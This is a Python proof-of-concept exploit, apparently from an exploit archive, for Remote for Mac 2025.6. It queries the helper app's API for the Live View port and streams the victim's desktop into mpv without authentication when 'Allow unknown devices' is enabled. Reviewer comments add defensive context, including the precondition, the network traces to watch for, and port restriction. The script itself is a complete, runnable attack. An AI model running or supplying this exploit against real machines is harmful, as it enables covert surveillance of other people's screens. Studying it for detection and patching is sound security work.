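# Exploit Title: Remote for Mac 2025.6 - Unauthenticated Desktop Stream Exploit
# Date: 2025-05-27
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://rs.ltd
# Software Link: https://rs.ltd/latest.php?os=mac
# Version: 2025.6
# Tested on: macOS Mojave 10.14.6

#!/usr/bin/env python3

'''
Remote for Mac 2025.6 - Unauthenticated Desktop Stream Exploit
Vulnerable Component: Helper app Live View feature (raw H264 over TCP)

Live View H264 per default is enabled.

- Works when "Allow unknown devices" setting is enabled (default: disabled)
- mpv required
'''

# Reviewer notes (defensive reading of this PoC):
# - Precondition: per the author, the stream is reachable without pairing only
#   when "Allow unknown devices" is switched on. That setting is off by
#   default, so leaving it off closes the path exercised here.
# - Observable trace: one HTTPS GET to /api/getVersion carrying an X-LiveView
#   header, followed by a plain TCP connection to the port named in the
#   "liveview.port" field of the reply. Both arriving from an unpaired address
#   is the pattern to look for in host or network logs.
# - Limiting which hosts can reach the helper's API port and the Live View
#   port reduces exposure independently of the setting above.
# - The page does not say whether a fixed release exists; confirm with the
#   vendor before treating 2025.6 as the only affected version.

import requests
import subprocess
import sys
import time
import urllib3

# verify=False in port() would otherwise print an InsecureRequestWarning.
urllib3.disable_warnings()

USAGE = "Usage: python live.py <ip:port>"


def p(s):
    """Split an ``ip:port`` command-line argument into ``(host, port)``.

    Prints the usage line and exits with status 1 when *s* is not exactly one
    colon-separated pair or when the port part is not an integer.
    """
    try:
        host, port_text = s.split(':')
        return host, int(port_text)
    except ValueError:
        # Raised both by a wrong number of ':' fields and by int().
        print(USAGE)
        sys.exit(1)


def port(i, pt):
    """Ask the helper's HTTPS API which TCP port serves Live View.

    Sends ``GET https://{i}:{pt}/api/getVersion`` with an ``X-LiveView``
    header and reads the ``liveview.port`` field of the JSON reply.

    Returns the port as an ``int`` in 1..65535, or ``None`` when the request
    fails, the reply is not a JSON object, or the field is missing or not a
    valid port number.
    """
    try:
        r = requests.get(
            f"https://{i}:{pt}/api/getVersion",
            headers={"X-LiveView": "fixed"},
            # Certificate checking is off, so the peer's identity is not
            # established and everything in the reply is untrusted input.
            verify=False,
            timeout=5,
        )
        reply = r.json()
    except (requests.RequestException, ValueError):
        # Connection/TLS/timeout errors, or a body that is not JSON.
        return None

    if not isinstance(reply, dict):
        return None

    # The value ends up in an mpv argument, so accept only a real port number
    # rather than forwarding whatever the remote side sent.
    try:
        live_port = int(reply.get('liveview.port'))
    except (TypeError, ValueError):
        return None
    return live_port if 0 < live_port < 65536 else None


def mpv(i, p):
    """Play the raw H264 stream at ``tcp://{i}:{p}`` in mpv.

    Blocks until mpv exits on its own or the user presses Ctrl-C, in which
    case the mpv process is terminated.
    """
    try:
        process = subprocess.Popen([
            'mpv',
            '--no-terminal',
            '--profile=low-latency',
            '--hwdec=auto',
            '--untimed',
            '--no-cache',
            '--osc=no',
            '--title=Remote for Mac Stream Exploit',
            f'tcp://{i}:{p}',
        ])
    except FileNotFoundError:
        print("Error: mpv not found")
        return

    print("Streaming...")
    try:
        # Poll instead of sleeping forever so the script ends when the
        # player window is closed or the connection drops.
        while process.poll() is None:
            time.sleep(1)
    except KeyboardInterrupt:
        process.terminate()


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(USAGE)
        sys.exit(1)

    i, pt = p(sys.argv[1])
    if (lp := port(i, pt)):
        mpv(i, lp)
    else:
        print("Error: No LiveView port")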